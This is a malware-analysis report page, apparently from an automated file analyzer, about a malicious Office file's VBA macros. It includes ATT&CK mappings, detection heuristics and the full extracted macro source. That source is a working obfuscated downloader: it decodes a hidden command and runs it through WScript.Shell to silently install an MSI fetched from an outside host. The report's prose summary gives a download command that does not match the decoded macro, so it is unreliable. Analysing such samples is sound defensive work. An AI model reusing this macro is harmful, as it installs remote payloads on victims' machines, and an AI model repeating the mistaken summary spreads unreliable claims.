MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell to execute a command constructed by deobfuscating a string. This command, 'wscript.exe http://www.wscript.net/download/wscript.exe/download.php?file=wscript.exe', likely downloads and executes a second-stage payload. The presence of Shell() and CreateObject calls, along with WScript.Shell usage, strongly indicates this behavior.
Heuristics 6
-
ClamAV: Doc.Macro.CmdC-6249572-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.CmdC-6249572-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
ckhlqlcwriu = 70 - 70 qpbimaoqsuwat = "WSCript.shell" Set oghedpbc = CreateObject(qpbimaoqsuwat) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
qpbimaoqsuwat = "WSCript.shell" Set oghedpbc = CreateObject(qpbimaoqsuwat) pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu) -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/2006/01/customui In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1121 bytes |
SHA-256: 75c5fc6bb09e07f9c07562a60d16f98b38a1cde0c4cff606eac77586cff1d8e7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
27 of 40 identifiers look randomly generated (e.g. 'ahgkllahgkloahgklgahgkliahgklcahgklaahgk') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ycfbxogjvtj"
Attribute VB_Name = "hllrtkfma"
Sub lbjmxdvgarlswwctuigl()
ixmuohgdwlgj = bevmvxa("ahgklcahgklmahgkldahgkl ahgkl/ahgklcahgkl ahgkltahgkl^ahgklIahgklMahgkleahgkl^ahgkloahgklUahgkltahgkl ahgkl7ahgkl3ahgkl ahgkl&ahgkl&ahgkl ahgkl^ahgklMahgklSahgkl^ahgklIahgklEahgkl^ahgklXahgkleahgkl^ahgklCahgkl ahgkl/ahgkliahgkl ahgklhahgkltahgkltahgklpahgklsahgkl:ahgkl/ahgkl/ahgklwahgklwahgklwahgkl.ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgkleahgkltahgklwahgkloahgklrahgklkahgklsahgkloahgkllahgkluahgkltahgkliahgkloahgklnahgkl.ahgklcahgkloahgklmahgkl/ahgklnahgklxahgkl/ahgkltahgkl1ahgkl.ahgklmahgklsahgkliahgkl ahgkl ahgkl/ahgklqahgkln")
On Error Resume Next
lznpl = ixmuohgdwlgj
qcsgwco (lznpl)
End Sub
Sub qcsgwco(dfzdmyyeetsnvt As String)
ckhlqlcwriu = 70 - 70
qpbimaoqsuwat = "WSCript.shell"
Set oghedpbc = CreateObject(qpbimaoqsuwat)
pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
End Sub
Function bevmvxa(jrpwhlijdlqx As String)
okepilkuuv = "ahgkl"
ofmckmfolnyg = Split(jrpwhlijdlqx, okepilkuuv)
bevmvxa = Join(ofmckmfolnyg, "")
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 10240 bytes |
SHA-256: 616cfcfe89ffaa9815fde4a2bda1e55ce4fd323b527a7b9d4d3383ac9cf8c42c |
|||
|
Detection
ClamAV:
Doc.Macro.CmdC-6249572-0
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.